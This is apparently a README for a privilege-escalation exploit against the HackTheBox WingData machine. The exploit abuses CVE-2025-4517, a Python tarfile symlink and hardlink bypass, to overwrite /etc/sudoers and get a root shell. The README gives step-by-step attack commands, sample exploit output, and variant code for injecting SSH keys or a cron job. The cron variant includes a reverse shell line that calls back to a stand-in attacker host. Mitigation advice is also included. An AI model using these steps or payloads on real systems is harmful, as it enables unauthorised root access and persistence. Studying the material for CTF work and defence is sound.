Share
## https://sploitus.com/exploit?id=0ED7DA4A-BFF9-589D-BA60-551E86D2BC2C
# CVE-2025-4517 Exploit - WingData HTB

## Overview

This exploit leverages **CVE-2025-4517**, a critical vulnerability in Python's `tarfile` module that allows arbitrary file write through a combination of symlink path traversal and hardlink manipulation. This bypasses the `filter="data"` protection introduced in Python 3.12.

### Vulnerability Details

- **CVE ID**: CVE-2025-4517
- **Affected Versions**: Python 3.8.0 through 3.13.1
- **CVSS Score**: 9.3 (Critical)
- **Impact**: Arbitrary file write with elevated privileges

## Technical Background

The vulnerability exploits a flaw in how Python's `tarfile.extractall()` handles the interaction between:

1. **Symlinks** - Used to create path traversal outside the extraction directory
2. **Hardlinks** - Used to reference files through the escaped symlink path
3. **Filter Bypass** - The `filter="data"` parameter blocks direct symlink escapes, but the hardlink technique circumvents this protection

### Attack Flow
```
1. Create deep nested directories (path confusion)
   โ””โ”€ Uses 247-character directory names repeated 16 levels deep

2. Build symlink chain for traversal
   โ””โ”€ Creates symlinks that resolve upward through directory tree

3. Escape symlink to target directory (/etc)
   โ””โ”€ Final symlink points outside extraction boundary

4. Create hardlink pointing through escape symlink
   โ””โ”€ Hardlink: "sudoers_link" โ†’ "escape/sudoers" โ†’ "/etc/sudoers"

5. Write content to hardlink
   โ””โ”€ Writing to "sudoers_link" actually writes to /etc/sudoers
```

## Target System: WingData HTB

### Vulnerable Component

**Script**: `/opt/backup_clients/restore_backup_clients.py`
```python
# Vulnerable code snippet
with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")
```

**Sudo Permissions**:
```
wacky ALL=(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
```

### System Details

- **OS**: Debian 12 (Bookworm)
- **Python Version**: 3.12.3 (Vulnerable to CVE-2025-4517)
- **Kernel**: 6.1.0-42-amd64

## Usage

### Prerequisites

- User access with sudo permissions for the vulnerable script
- Write access to `/opt/backup_clients/backups/`
- Python 3 on attacking machine

### Installation
```bash
# Download the exploit
wget https://raw.githubusercontent.com/yourusername/cve-2025-4517-wingdata/main/exploit.py

# Make executable
chmod +x exploit.py
```

### Basic Execution
```bash
# Run the exploit
./exploit.py

# Or with Python
python3 exploit.py
```

### Manual Step-by-Step

If you prefer to run each step manually:
```bash
# 1. Create the exploit tar
python3 exploit.py --create-only

# 2. Deploy to target
cp /tmp/cve_2025_4517_exploit.tar /opt/backup_clients/backups/backup_9999.tar

# 3. Execute via vulnerable script
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py \
  -b backup_9999.tar \
  -r restore_exploit

# 4. Verify sudoers modification
sudo cat /etc/sudoers | grep "$(whoami)"

# 5. Get root
sudo /bin/bash
```

## Output Example
```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘     CVE-2025-4517 Tarfile Exploit - WingData HTB          โ•‘
โ•‘     Privilege Escalation via Symlink + Hardlink Bypass    โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Target user: wacky
[*] Creating exploit tar for user: wacky
[*] Phase 1: Building nested directory structure...
[*] Phase 2: Creating symlink chain for path traversal...
[*] Phase 3: Creating escape symlink to /etc...
[*] Phase 4: Creating hardlink to /etc/sudoers...
[*] Phase 5: Writing sudoers entry...
[+] Exploit tar created: /tmp/cve_2025_4517_exploit.tar
[*] Deploying exploit to: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit deployed successfully
[*] Triggering extraction via vulnerable script...
[+] Backup: backup_9999.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed
[*] Verifying exploit success...
[+] SUCCESS! User 'wacky' added to sudoers
[+] Entry: wacky ALL=(ALL) NOPASSWD: ALL

============================================================
[+] EXPLOITATION SUCCESSFUL!
[+] User 'wacky' now has full sudo privileges
[+] Get root with: sudo /bin/bash
============================================================

[?] Spawn root shell now? (y/n): y
[*] Spawning root shell...
[*] Run: sudo /bin/bash

root@wingdata:/tmp# whoami
root
root@wingdata:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
```

## Proof of Concept Flow

### Stage 1: Initial Access
- Exploit Wing FTP Server (CVE-2020-9470 or credential stuffing)
- Gain shell as `wingftp` or crack user credentials
- Escalate to `wacky` user via password reuse

### Stage 2: Privilege Escalation (This Exploit)
- Identify sudo permissions on backup restore script
- Recognize Python version vulnerable to CVE-2025-4517
- Deploy tar exploit to modify `/etc/sudoers`
- Gain root access

## Mitigation

### For Python Developers

1. **Upgrade Python**: Update to Python 3.13.2+ or apply security patches
```bash
   python3 --version  # Check version
```

2. **Additional Validation**: Implement strict validation on tar contents
```python
   # Check for suspicious members before extraction
   for member in tar.getmembers():
       if member.islnk() or member.issym():
           raise SecurityError("Symlinks/hardlinks not allowed")
```

3. **Restrict Extraction Paths**: Verify all extracted files stay within bounds
```python
   import os
   for member in tar.getmembers():
       member_path = os.path.join(extract_path, member.name)
       if not member_path.startswith(os.path.abspath(extract_path)):
           raise SecurityError("Path traversal detected")
```

### For System Administrators

1. **Limit sudo Access**: Minimize scripts that can be run as root
```bash
   # Remove or restrict backup script sudo access
   visudo
```

2. **Input Validation**: Validate tar archives before processing
```bash
   # Check tar contents before extraction
   tar -tzf archive.tar | grep -E '\.\./|^/'
```

3. **File Integrity Monitoring**: Monitor critical files like `/etc/sudoers`
```bash
   # Setup AIDE or similar IDS
   aide --check
```

4. **AppArmor/SELinux**: Implement mandatory access controls

## References

### CVE Information
- [CVE-2025-4517 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-4517)
- [CVE-2025-4138 - Related Vulnerability](https://nvd.nist.gov/vuln/detail/CVE-2025-4138)
- [Python Security Advisory](https://www.python.org/downloads/release/python-3132/)

### Research & Write-ups
- [Linux Security Advisory](https://linuxsecurity.com/news/security-vulnerabilities/python-tarfile-supply-chain-risk)
- [Google Security Research - GHSA-hgqp-3mmf-7h8f](https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f)

### Public PoCs
- [DesertDemons CVE-2025-4138-4517-POC](https://github.com/DesertDemons/CVE-2025-4138-4517-POC)
- [StealthByte CVE-2025-4517-poc](https://github.com/StealthByte0/CVE-2025-4517-poc)
- [AnimePrincess420 PoC](https://github.com/AnimePrincess420/CVE-2025-4517-PoC)

### HackTheBox
- [WingData Machine](https://app.hackthebox.com/machines/WingData)

## Variants

### SSH Key Injection

Instead of modifying `/etc/sudoers`, you can inject SSH keys into `/root/.ssh/authorized_keys`:
```python
# Modify Phase 3 to point to /root
e.linkname = linkpath + "/../../../../../../../root"

# Add .ssh directory creation
ssh_dir = tarfile.TarInfo("escape/.ssh")
ssh_dir.type = tarfile.DIRTYPE
tar.addfile(ssh_dir)

# Hardlink to authorized_keys
f.linkname = "escape/.ssh/authorized_keys"

# Write SSH public key content
# (requires pre-generating SSH key pair)
```

### Cron Job Injection

Write to `/etc/cron.d/` for persistence:
```python
# Point to /etc
e.linkname = linkpath + "/../../../../../../../etc"

# Hardlink to cron job
f.linkname = "escape/cron.d/rootjob"

# Write cron content
content = b"* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'\n"
```

## Troubleshooting

### Common Issues

**Issue**: `[!] Error during extraction: "linkname 'escape/sudoers' not found"`

**Solution**: The target file must exist. `/etc/sudoers` always exists, but if targeting other files, ensure they exist first or create them in a prior extraction.

---

**Issue**: `cp: not writing through dangling symlink`

**Solution**: Remove the dangling symlink first:
```bash
rm /opt/backup_clients/backups/backup_9999.tar
```

---

**Issue**: Exploit succeeds but can't sudo

**Solution**: Check sudoers syntax:
```bash
sudo visudo -c
```

If syntax is invalid, the file won't be processed.

## Legal Disclaimer

This exploit is provided for **educational purposes only** and is intended for use in:

- Authorized penetration testing engagements
- Capture The Flag (CTF) competitions like HackTheBox
- Security research in controlled environments
- Vulnerability disclosure and patch development

**DO NOT** use this exploit against systems you do not own or have explicit written permission to test. Unauthorized access to computer systems is illegal under:

- Computer Fraud and Abuse Act (CFAA) - United States
- Computer Misuse Act - United Kingdom  
- Similar legislation in other jurisdictions

The author(s) assume no liability for misuse of this code.

## Author

**Original Research**: Multiple security researchers (see References)

**HTB Implementation**: Community contributors

**This Exploit**: Adapted for WingData HTB machine

## Contributing

Found a bug or improvement? Feel free to:

1. Fork the repository
2. Create a feature branch
3. Submit a pull request

## License

MIT License - See LICENSE file for details

---

**Last Updated**: February 2026

**Status**: โœ… Working on HackTheBox WingData machine

**Difficulty**: Medium โ†’ Root via CVE-2025-4517